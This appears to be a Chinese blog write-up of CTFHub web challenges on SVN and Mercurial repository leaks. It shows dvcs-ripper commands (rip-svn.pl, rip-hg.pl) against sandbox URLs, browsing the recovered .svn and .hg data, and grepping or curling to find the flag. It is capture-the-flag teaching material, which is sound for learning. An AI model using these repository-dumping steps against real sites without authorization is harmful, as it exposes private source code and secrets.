CTFHUB WEB 信息泄露(补充)

上一次没有写完这个技能树知识点 这次补上

svn泄露

先了解一下svn泄露

 

 

 他说Flag 在服务端旧版本的源代码中 尝试找一下 看了其他大佬的wp 才知道svn泄露是有工具要用的 在kali里打开 用到的工具是dvcs-ripper 也可以自己下载 在ctfhub的工具栏里边有

 自己下载的要安装一下依赖项

sudo apt-get install perl libio-socket-ssl-perl libdbd-sqlite3-perl libclass-dbi-perl libio-all-lwp-perl

接下来就是用 dvcs-ripper 将泄露的文件下载到本地目录中

./rip-svn.pl -u http://challenge-a32f3a68ea87bef9.sandbox.ctfhub.com:10800/.svn

 

ls -al查看所有文件

进入到.svn目录中 cd .svn 并查看 ls -al

网页提示说flag在服务端旧版本的源代码中,那么应该检查一下pristine文件是否存放flag 

 

看到两个文件 69 bf 

打开69文件 cd 69    ls -al

cat 694a8327dbff445a8bb0405e296020ef9986b831.svn-base 得到flag

 之前找不到文件是因为命令用错了

HG泄露

 当开发人员使用 Mercurial 进行版本控制,对站点自动部署。使用hg init 新建仓库的时候,会生成一个备份文件.hg如果配置不当,可能会将.hg 文件夹直接部署到线上环境。

 

这题还是要用到kali的dvcs-ripper

进入dvcs-ripper目录

使用命令

perl ./rip-hg.pl -v -u http://challenge-9790eba80b223857.sandbox.ctfhub.com:10800/.hg

 

 看一下.hg目录里有什么  tree .hg

 查看可疑的文本文件是否存在此题flag,发现历史版本add flag cat .hg/last-message.txt

 

发现历史版本可以使用正则表达式进行关键字查找 grep -a -r flag

 

使用curl命令检查一下data数据中的文本文件,发现此题flag

curl http://challenge-9790eba80b223857.sandbox.ctfhub.com:10800/flag_2918618140.txt

 

  得到flag

 

 

 

 

 

 

 

 

 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值